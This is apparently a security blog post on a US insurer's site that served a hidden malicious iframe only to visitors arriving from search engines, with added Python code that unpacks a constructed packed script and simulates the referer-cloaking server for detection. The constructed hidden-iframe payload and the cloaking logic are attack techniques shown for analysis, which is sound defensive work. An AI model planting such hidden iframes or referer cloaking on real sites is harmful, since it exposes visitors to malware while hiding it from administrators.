At the beginning of the month I spotted a specialist US insurer’s website infected with Mal/Iframe-Gen.
An initial scan of the page had come back clean. However, when I investigated more deeply I did see the malicious code. The difference between the two scans was that my second scan had an HTTP Referer header (RFC 2616, section 14.36 Referer) set.
So I downloaded the site again, this time with a Referer set:
wget --referer="search engine" infected.site
This time the response contained an injected script. The eagle-eyed amongst you will recognise it as obfuscated with the (in)famous Dean Edwards packer (the eval(function(p,a,c,k,e,d){...}) wrapper). When this script is unpacked you are presented with an iframe pointing to a domain under "co.cc", with width and height attributes small enough that nothing is visible on the page.
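To show what "unpacking" means here, the following is an added example and not code from the original post: a Python port of the packer's decoding loop (the e() token function and the word-for-token substitution), run over a constructed packed script that hides a 1px-by-1px iframe. The packed sample, the example.co.cc target and the helper names are all assumptions made for this example; the real script from the infected site is not reproduced.

```python
import re

# Constructed sample in the shape produced by Dean Edwards' packer; this is NOT
# the script recovered from the infected site. The payload it hides creates a
# 1px-by-1px iframe pointing at a hypothetical host under co.cc.
PACKED = (
    "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}"
    "k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}"
    "return p}('0 1=2.3(\\'4\\');1.5=\\'http://example.co.cc/\\';"
    "1.6.7=\\'1px\\';1.6.8=\\'1px\\';2.9.a(1);',62,11,"
    "'var|f|document|createElement|iframe|src|style|width|height|body|appendChild'"
    ".split('|'),0,{}))"
)

# The packer's well-known prologue; its presence is a cheap first triage check.
PACKER_SIGNATURE = "eval(function(p,a,c,k,e,d)"

# The trailing call looks like }('<p>',<a>,<c>,'<k>'.split('|'),...) with JS
# backslash escapes inside <p>; this regex pulls the four arguments out.
_ARGS = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)

_BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def looks_packed(js):
    """True if the script carries the packer's eval(function(p,a,c,k,e,d) prologue."""
    return PACKER_SIGNATURE in js


def encode(c, a):
    """Port of the packer's e() function: the token that stands for word index c in base a."""
    prefix = "" if c < a else encode(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else _BASE36[c])


def _unescape_js(s):
    # Undo the single-level backslash escaping used inside the JS string literal.
    return re.sub(r"\\(.)", r"\1", s)


def unpack(js):
    """Reverse the packer: replace each base-a token in p with the matching word in k."""
    m = _ARGS.search(js)
    if not m:
        raise ValueError("not in packer format")
    p = _unescape_js(m.group(1))
    a, c = int(m.group(2)), int(m.group(3))
    k = _unescape_js(m.group(4)).split("|")
    # Same order as the original loop: highest index first, so multi-character
    # tokens are substituted before the single characters they are built from.
    for i in range(c - 1, -1, -1):
        word = k[i] if i < len(k) else ""
        if word:
            p = re.sub(r"\b" + re.escape(encode(i, a)) + r"\b", lambda _m, w=word: w, p)
    return p


def iframe_src_urls(js):
    """Pull every URL assigned to a .src property out of the unpacked script."""
    return re.findall(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", js)


if __name__ == "__main__":
    if looks_packed(PACKED):
        clear = unpack(PACKED)
        print(clear)
        print("iframe targets:", iframe_src_urls(clear))
```

The decoding is deliberately done without evaluating any JavaScript: the packed blob is parsed with a regular expression and the substitution loop is reimplemented, so a suspicious sample never gets executed during analysis.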
Ever since "co.cc" names (free subdomains handed out under the co.cc domain, not a true top-level domain) have been available for registration, the researchers at SophosLabs have seen them abused heavily by malware and used in spam campaigns.
So why does this site serve malware only when you arrive at it from a search site? The site's .htaccess file had been modified so that the web server behaves differently depending on the Referer header: requests that arrive from a search engine get the injected script, everyone else gets the clean page.
To modify the .htaccess file the attacker is likely to have had more access than a simple SQL injection would give; previous cases we have investigated have been tracked down to compromised FTP passwords.
Attackers use this technique because it makes finding the offending code much harder for the website's administrators and for security professionals.
After all, they already know the website's URL and type it in directly, so they never arrive with a search-engine Referer and never see the injected code. The practical lesson for anyone checking a site is to fetch it more than once, with and without a search-engine Referer (wget --referer or curl -e), and compare the responses; administrators should also audit their .htaccess files for rules conditioned on the Referer.
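The probe just described, as an added example that is not the original post's code: a Python script that stands up a local stub web server mimicking the infected site (it serves the iframe only when the Referer names a search engine, which is what a referer-conditional .htaccess rule does server-side) and a probe that fetches the page with and without a search-engine Referer, like wget --referer, and reports what differs. The stub server, the page contents, the search-engine pattern and the example.co.cc target are all constructed for this example.

```python
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed fixture: a local server that behaves like the infected site,
# injecting the iframe only for visitors whose Referer names a search engine.
# The target host under co.cc is hypothetical.
CLEAN_PAGE = b"<html><body><h1>Insurance quotes</h1></body></html>"
INJECTED = b'<iframe src="http://example.co.cc/" width="1" height="1"></iframe>'
SEARCH_ENGINE_REFERER = re.compile(r"https?://[^/]*(google|yahoo|bing)\.", re.I)


class CloakingHandler(BaseHTTPRequestHandler):
    """Serves the clean page unless the Referer says the visitor came from a search engine."""

    def do_GET(self):
        body = CLEAN_PAGE
        referer = self.headers.get("Referer", "")
        if SEARCH_ENGINE_REFERER.search(referer):
            body = CLEAN_PAGE.replace(b"</body>", INJECTED + b"</body>")
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_cloaking_server():
    """Start the simulated infected site on an ephemeral localhost port."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), CloakingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/" % server.server_address[1]


def fetch(url, referer=None):
    """GET the page, optionally with a Referer header (what wget --referer / curl -e send)."""
    req = urllib.request.Request(url)
    if referer:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(url, referers=("http://www.google.com/search?q=insurance",)):
    """Fetch with no Referer, then with each candidate Referer; report what differs."""
    baseline = fetch(url)
    findings = {}
    for ref in referers:
        body = fetch(url, ref)
        findings[ref] = {
            "differs": body != baseline,
            "iframes": re.findall(r'<iframe[^>]+src=["\']([^"\']+)["\']', body, re.I),
        }
    return baseline, findings


if __name__ == "__main__":
    srv, url = start_cloaking_server()
    try:
        base, found = probe(url)
        for ref, result in found.items():
            print(ref, "->", "DIFFERENT" if result["differs"] else "same", result["iframes"])
    finally:
        srv.shutdown()
```

Pointing probe() at a real site instead of the stub is the same two-request check the post performed by hand with wget; a direct fetch that looks clean says nothing until the search-engine-referred fetch has been compared against it.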